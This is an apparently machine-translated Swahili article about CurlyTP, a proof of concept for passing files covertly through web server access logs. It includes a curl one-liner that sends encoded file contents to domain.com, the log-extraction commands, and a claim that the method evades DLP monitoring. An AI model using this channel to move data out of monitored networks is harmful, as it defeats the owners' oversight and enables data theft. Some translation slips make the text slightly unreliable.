Kubadilishana kwa ujumbe wa siri kupitia kumbukumbu za seva

Kulingana na ufafanuzi wa Wikipedia, kushuka kwa wafu ni zana ya njama ambayo hutumika kubadilishana habari au baadhi ya vitu kati ya watu kwa kutumia eneo la siri. Wazo ni kwamba watu hawakutani kamwe - lakini bado wanabadilishana habari ili kudumisha usalama wa kiutendaji.

Mahali pa kujificha haipaswi kuvutia tahadhari. Kwa hiyo, katika ulimwengu wa nje ya mtandao mara nyingi hutumia vitu vya busara: matofali huru kwenye ukuta, kitabu cha maktaba, au shimo kwenye mti.

Kuna zana nyingi za usimbuaji na kutokutambulisha kwenye Mtandao, lakini ukweli wa kutumia zana hizi huvutia umakini. Kwa kuongeza, wanaweza kuzuiwa katika kiwango cha ushirika au serikali. Nini cha kufanya?

Msanidi programu Ryan Flowers alipendekeza chaguo la kuvutia - tumia seva yoyote ya wavuti kama mahali pa kujificha. Ikiwa unafikiria juu yake, seva ya wavuti hufanya nini? Hupokea maombi, hutoa faili na kuandika kumbukumbu. Na inaweka maombi yote, hata zisizo sahihi!

Inabadilika kuwa seva yoyote ya wavuti hukuruhusu kuokoa karibu ujumbe wowote kwenye logi. Maua alishangaa jinsi ya kutumia hii.

Anatoa chaguo hili:

  1. Chukua faili ya maandishi (ujumbe wa siri) na uhesabu heshi (md5sum).
  2. Tunaisimba (gzip+uuencode).
  3. Tunaandika kwenye logi kwa kutumia ombi lisilo sahihi kwa makusudi kwa seva.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Ili kusoma faili, unahitaji kufanya shughuli hizi kwa utaratibu wa reverse: decode na unzip faili, angalia hashi (hashi inaweza kupitishwa kwa usalama juu ya njia wazi).

Nafasi zinabadilishwa na =+=ili hakuna nafasi katika anwani. Programu, ambayo mwandishi anaiita CurlyTP, hutumia usimbaji wa base64, kama viambatisho vya barua pepe. Ombi linafanywa na neno kuu ?transfer?ili mpokeaji aweze kuipata kwa urahisi kwenye kumbukumbu.

Tunaona nini kwenye magogo katika kesi hii?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kama ilivyotajwa tayari, ili kupokea ujumbe wa siri unahitaji kufanya shughuli kwa mpangilio wa nyuma:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Mchakato ni rahisi kujiendesha. Md5sum inalingana, na yaliyomo kwenye faili yanathibitisha kuwa kila kitu kiliamuliwa kwa usahihi.

Mbinu ni rahisi sana. "Lengo la zoezi hili ni kudhibitisha kuwa faili zinaweza kuhamishwa kupitia maombi madogo ya wavuti, na inafanya kazi kwenye seva yoyote ya wavuti iliyo na kumbukumbu za maandishi wazi. Kimsingi, kila seva ya wavuti ni mahali pa kujificha!” anaandika Maua.

Bila shaka, njia hiyo inafanya kazi tu ikiwa mpokeaji ana upatikanaji wa kumbukumbu za seva. Lakini upatikanaji huo hutolewa, kwa mfano, na wahudumu wengi.

Jinsi ya kuitumia?

Ryan Flowers anasema yeye si mtaalamu wa usalama wa habari na hatatayarisha orodha ya uwezekano wa matumizi ya CurlyTP. Kwa ajili yake, ni uthibitisho tu wa dhana kwamba zana zinazojulikana tunazoziona kila siku zinaweza kutumika kwa njia isiyo ya kawaida.

Kwa kweli, njia hii ina idadi ya faida juu ya seva zingine "fiche" kama Digital Dead Drop au PirateBox: hauhitaji usanidi maalum kwa upande wa seva au itifaki yoyote maalum - na haitasababisha mashaka kati ya wale wanaofuatilia trafiki. Haiwezekani kwamba mfumo wa SORM au DLP utachanganua URL za faili za maandishi zilizobanwa.

Hii ni mojawapo ya njia za kusambaza ujumbe kupitia faili za huduma. Unaweza kukumbuka jinsi kampuni zingine za hali ya juu zilivyokuwa zikiweka Kazi za Wasanidi Programu katika Vichwa vya HTTP au katika msimbo wa kurasa za HTML.

Kubadilishana kwa ujumbe wa siri kupitia kumbukumbu za seva

Wazo lilikuwa kwamba watengenezaji wa wavuti tu ndio wangeona yai hili la Pasaka, kwani mtu wa kawaida hatatazama vichwa au msimbo wa HTML.

Kubadilishana kwa ujumbe wa siri kupitia kumbukumbu za seva

Chanzo: mapenzi.com

Kuongeza maoni